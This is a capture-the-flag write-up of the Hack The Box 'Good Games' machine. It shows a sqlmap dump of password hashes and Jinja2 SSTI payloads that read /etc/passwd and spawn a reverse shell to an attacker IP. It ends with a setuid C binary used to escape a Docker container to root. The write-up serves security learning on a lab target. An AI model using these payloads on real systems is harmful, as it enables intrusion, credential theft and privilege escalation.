> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box/htb-good-games.md).

# HTB - Good Games

## Enumeration and Foothold

### NMAP

```
PORT   STATE SERVICE VERSION
80/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.9.2)
```

### HTTP

Browsing to port 80 reveals a web application for Gaming Platform

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLkVznsKccePONQ2VQUSb%2Fimage.png?alt=media&amp;token=78439400-8367-4392-a2e5-8819913c1a4a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fbed2GG4LBTDrb63hlo9z%2Fimage.png?alt=media&amp;token=6945a79c-f6a0-4ae4-a66d-26e484715ffc" alt=""><figcaption></figcaption></figure>

Everything on the application is static.

Clicking on the store leads to a subscribe option

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F21UykcogFQUEFXHjJKVY%2Fimage.png?alt=media&amp;token=da418f18-82f2-488f-bf64-b976a5d14f4c" alt=""><figcaption></figcaption></figure>

nothing happens while subscribing that said i will enumerate the hidden directories.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsdZHXpXtNV9PDZaWzdMw%2Fimage.png?alt=media&amp;token=f46755da-da69-4cae-ba18-a668f5162c22" alt=""><figcaption></figcaption></figure>

There is a login and a signup page.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F0ls0RxPnBsygz42M4Poe%2Fimage.png?alt=media&amp;token=96b82252-b30b-477c-848d-d985fd29d117" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fgq1MAz1WuIXldAqNZ0pe%2Fimage.png?alt=media&amp;token=a4c792ca-d2f5-4690-a487-a70ece238c9f" alt=""><figcaption></figcaption></figure>

Browsing to the directory doesn’t work

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fo00WtRtABbHb7FjOx2h7%2Fimage.png?alt=media&amp;token=35a7841a-b821-45df-a0be-51621dad79b8" alt=""><figcaption></figcaption></figure>

Bu the login page is accessible by the small user icon on the top.

First thing first i will test the application for SQL injection if not vulnerable i will register an account and investigate further.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FKDfQbfrn0hbGsIPfbLpD%2Fimage.png?alt=media&amp;token=9389c53d-af0c-4478-9546-ccf291454091" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fn0Hh2FKHxPMLoGI4Krjp%2Fimage.png?alt=media&amp;token=2f389e59-9129-465b-8423-f1f4e1b6a218" alt=""><figcaption></figcaption></figure>

i am gonna use the sqlmap to automate this process

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FVjOcB8bZtFm9KQbYDJ6D%2Fimage.png?alt=media&amp;token=0cc80267-8075-4c8e-87bd-aaf659f5ee72" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FAlUcVJjZLW30mvBV5lsF%2Fimage.png?alt=media&amp;token=353a8f4b-fc85-4da3-8f1e-1acd76c84b92" alt=""><figcaption></figcaption></figure>

sqlmap confirms email parameter is injectable by boolean based blind injection.

### SQL Injection via SqlMap

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMyIzRcbTxor05LpKtCKq%2Fimage.png?alt=media&amp;token=4cb77d62-c4ac-4c5c-b6e5-7075f11663b4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fg8PWloUx0t7oPOG6R7EI%2Fimage.png?alt=media&amp;token=07f9876e-04ff-4698-b86b-0c253131ef76" alt=""><figcaption></figcaption></figure>

there are two databases i will use main.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FoJCkBFwzr02bIIFkm6h4%2Fimage.png?alt=media&amp;token=b5b17702-b743-4bfc-8e4f-9733c3ae12e4" alt=""><figcaption></figcaption></figure>

main has three tables

user table is interesting

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FlOIjldi6dhUg8jErE9nT%2Fimage.png?alt=media&amp;token=e8438ad4-464d-4dab-bead-2be827fa0392" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FIUyebyqGuXUPLaF2t20W%2Fimage.png?alt=media&amp;token=e10575ac-68c1-4e62-9e9e-b921f62dc0cd" alt=""><figcaption></figcaption></figure>

next i am gonna dump the users table

```bash
──(ajay㉿kali)-[~]
└─$ sqlmap -r reques --batch --level 3 --risk 2 --dbs -p email -D main -T user --dump  
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2For99nEuXoogzmAX3CgfA%2Fimage.png?alt=media&amp;token=8674b812-e33b-4474-b6a1-a5094c4785b6" alt=""><figcaption></figcaption></figure>

Found the admin user password hash

crack station cracked the password

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FQEwqCR3zioG25p7N9p9s%2Fimage.png?alt=media&amp;token=71c9ae58-7ad7-4a4c-8ecf-4a5faf6bbd72" alt=""><figcaption></figcaption></figure>

Now i can use the admin credentials to login.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FEnQyfyU92YDw8VH9aKI8%2Fimage.png?alt=media&amp;token=100cba50-19dc-48cf-98bc-83f351931651" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FN1SuaIgXdFIqRapQlNwN%2Fimage.png?alt=media&amp;token=69ec3862-8b84-4f1f-ac86-4bbe1c527047" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiWzm48gWAjQgyJJTqJe5%2Fimage.png?alt=media&amp;token=5aea97ab-5e04-434c-bd45-29924d14d95e" alt=""><figcaption></figcaption></figure>

Clicking on settings leaked internal domain name&#x20;

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsR4nP7DCdvtG7W3p82Ez%2Fimage.png?alt=media&amp;token=255a8def-d270-4b59-884a-3fe3ec123f8a" alt=""><figcaption></figcaption></figure>

add it to hosts file.

Once added request the settings again.

it got redirected to a login page.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDJ0VpMZiWHz1FUNJdGrP%2Fimage.png?alt=media&amp;token=7a5a50ca-0bb7-47d2-ad95-217b80002ccd" alt=""><figcaption></figcaption></figure>

the credentials for admin user works

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FY2QD5ALnVtPC5PWrD4qc%2Fimage.png?alt=media&amp;token=477ef33f-3402-489d-b42b-4538d86b6b7d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Ff9SgLpjWgnkqQc5HXqPT%2Fimage.png?alt=media&amp;token=c1767d4a-c6a6-47da-ac33-04e1a11ebb8e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvP0A22i0xuc0DD66GbPp%2Fimage.png?alt=media&amp;token=6f8ab68b-f5d4-4504-9fe2-3812a8809ff7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FIpbrlFMrNxnUe0cKGq53%2Fimage.png?alt=media&amp;token=6cf127ee-f8e0-40e9-9389-b76a9a255507" alt=""><figcaption></figcaption></figure>

Updating the settings page and sending it sends the below request

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FbEiWNu3dudl2YcqwEinI%2Fimage.png?alt=media&amp;token=dcc5c6f0-590c-4b2a-99be-12c7ec93addc" alt=""><figcaption></figcaption></figure>

once updated the name field is being reflected

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6QGub6Pwu8MKN8RmG0Zl%2Fimage.png?alt=media&amp;token=df557a25-9237-4653-8429-a9838eed8118" alt=""><figcaption></figcaption></figure>

that said i can try for possible injection attacks.

As the application is running flask and running a python server SSTI is a common exploit here.

## SSTI

sending payload :&#x20;

```
${{<%[%'"}}%\.
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FqysIvj2QUVHCwNvM7TcC%2Fimage.png?alt=media&amp;token=54bf229e-8af5-4c4a-b414-fd1dce674ffe" alt=""><figcaption></figcaption></figure>

Results in internal error possible sign for SSTI

that said lets enumerate the template being used though it commonly uses Jinja2 I want to confirm manually.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FZ7I1cnTl8wOopVouRw7j%2Fimage.png?alt=media&amp;token=8d2894d3-c216-45a0-8166-57ef6d186e73" alt=""><figcaption></figcaption></figure>

Courtesy : Hackthebox CPTS learning Path

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F7WDUOrpIumQ2lnWvfR5a%2Fimage.png?alt=media&amp;token=0a5e6cc4-c092-4851-828e-8c7bbca46c21" alt=""><figcaption></figcaption></figure>

next payload to try : {{7\*7}}

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FxK9oZuEumniSEIEJlHui%2Fimage.png?alt=media&amp;token=67d25b6d-3219-4229-be1b-dc8c89a8fbe9" alt=""><figcaption></figcaption></figure>

confirmed SSTI and to confirm template next payload to use : {{7\*'7'}}

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FpGPnpwMtHcfp79yfCJwU%2Fimage.png?alt=media&amp;token=bb209b95-c56e-4afd-86f6-991f9a749c27" alt=""><figcaption></figcaption></figure>

The result will enable us to deduce the template engine used by the web application. In Jinja, the result will be `7777777`, while in Twig, the result will be `49`.

Hence the Template is Jinja confimed.

Jinja is a template engine commonly used in Python web frameworks such as `Flask` or `Django`. This section will focus on a `Flask` web application. The payloads in other web frameworks might thus be slightly different.

### SSTI - Jinja2

We can use Python's built-in function `open` to include a local file. However, we cannot call the function directly; we need to call it from the `__builtins__` dictionary we dumped earlier. This results in the following payload to include the file `/etc/passwd`:

```
{{ self.__init__.__globals__.__builtins__.open("/etc/passwd").read() }}
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FE44dssId5cCnnOPpew1V%2Fimage.png?alt=media&amp;token=4d06331c-e04a-44a2-81f9-6a885d705f51" alt=""><figcaption></figcaption></figure>

That said i am gonna use it to get RCE.

To achieve remote code execution in Python, we can use functions provided by the `os` library, such as `system` or `popen`. However, if the web application has not already imported this library, we must first import it by calling the built-in function `import`. This results in the following SSTI payload:

```
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FjGnCl1177WrvgbXqrTzh%2Fimage.png?alt=media&amp;token=d68eff41-bb8b-4a14-aeca-40149ad12ac2" alt=""><figcaption></figcaption></figure>

Changing the command from id to ls displays the files

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdLzPoGQ1EXfveuUMC6IM%2Fimage.png?alt=media&amp;token=ca652a10-1cc6-41d9-aa04-bbdf97e71452" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9jL0eFvIEcVpjPhPZZCm%2Fimage.png?alt=media&amp;token=75c51f3a-0067-46e2-b94b-33122e2e48be" alt=""><figcaption></figcaption></figure>

it is running as root.

that said i can straight away got to get shell access

```
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('python3 -c \'import socket,os,pty;s=socket.socket();s.connect(("10.10.14.49",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")\'').read() }}
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FCEOaHzsr9QJQrWiPOoAY%2Fimage.png?alt=media&amp;token=ffaa0bf9-5c68-45eb-bdfb-7c9e2ed27176" alt=""><figcaption></figcaption></figure>

looking at the shell it is a docker environment so wee need to escape the docker.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2zQTf2gr7dbWmknIS3z7%2Fimage.png?alt=media&amp;token=94ef5a1f-e526-4ff6-a1a5-0f3fc712e652" alt=""><figcaption></figcaption></figure>

Stabilise the shell

```bash
root@3a453ab39d3d:/home/augustus# python3 -c 'import pty; pty.spawn("/bin/bash")'
<us# python3 -c 'import pty; pty.spawn("/bin/bash")'
root@3a453ab39d3d:/home/augustus# export TERM=xterm
export TERM=xterm
root@3a453ab39d3d:/home/augustus# 
```

## Docker Escape

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FgAXxJQxe3yamii30bp1j%2Fimage.png?alt=media&amp;token=42575e98-435b-403c-a1ae-db25ed66f1e7" alt=""><figcaption></figcaption></figure>

```
root@3a453ab39d3d:~# forfor i in $(seq 1 254); do (ping -c 1 -W 1 172.19.0.$i &> /dev/null && echo "172.19.0.$i is up") & done 2>/dev/null; wait 2>/dev/null
ev/null && echo "172.19.0.$i is up") & done 2>/dev/null; wait 2>/dev/null
172.19.0.2 is up
172.19.0.1 is up
root@3a453ab39d3d:~# 
```

```
root@3a453ab39d3d:~# forfor p in 21 22 80 443 3306 8080; do (echo > /dev/tcp/172.19.0.1/$p) &>/dev/null && echo "172.19.0.1:$p open"; done
.0.1/$p) &>/dev/null && echo "172.19.0.1:$p open"; done2.19.
172.19.0.1:22 open
172.19.0.1:80 open
```

SSH is open.

also running mount showed that `/home/augustus` directory was mounted from the host system.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FnhTlkk7L4XiH0F92PfjA%2Fimage.png?alt=media&amp;token=51e6f136-27ba-498c-9414-b9431ab026d7" alt=""><figcaption></figcaption></figure>

That said i already have admin creds attempting to password reuse got access as augustus.

we saw `/home/augustus` inside the container. That’s weird, let’s get back to the container and see if `augustus` is actually user:

```
root@3a453ab39d3d:/backend# grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
root@3a453ab39d3d:/backend# grep augustus /etc/passwd
```

It is not, the only user inside the container is `root`. Hence, the container has a volume mount from the host machine (i.e. `/home/augustus`).&#x20;

### Shell as Augustus

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FyJdxLotc5pGiFePfdAxW%2Fimage.png?alt=media&amp;token=2172ec57-8e4d-48d9-8319-e5b71cf19e26" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FgVq7dQLoPD2xvw6tWQHE%2Fimage.png?alt=media&amp;token=6c52103c-6cf5-4c59-af21-78f3557ce691" alt=""><figcaption></figcaption></figure>

Since `/home/augustus` is the same physical filesystem on both sides (bind mount), and you're root in the container, you can copy `bash`, set the setuid bit as root (which only root can do), and then execute it as `augustus` on the host to get a root-owned shell via the setuid bit.

```bash
cat << 'EOF' > /home/augustus/root.c
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main(void) {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", "-p", NULL);
    return 0;
}
EOF
```

```
gcc -o /home/augustus/rootexploit /home/augustus/root.c
```

### Shell as Root

on container:

```
chown root:root /home/augustus/rootexploit
chmod +s /home/augustus/rootexploit
```

```
Augustus@GoodGames:~$ ./rootexploit         ./rootexploit
./rootexploit
root@GoodGames:~# id                id
id
uid=0(root) gid=0(root) groups=0(root),1000(augustus)
root@GoodGames:~# cd /root          cd /root
cd /root
root@GoodGames:/root# ls                    ls
ls
root.txt
root@GoodGames:/root# cat root.txt          cat root.txt
cat root.txt
8f3af23d7444685774329ced01cdb1c4
root@GoodGames:/root# 

```

There were error in copying the /bin/bash mainly the library errors using the c exploit it worked.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box/htb-good-games.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
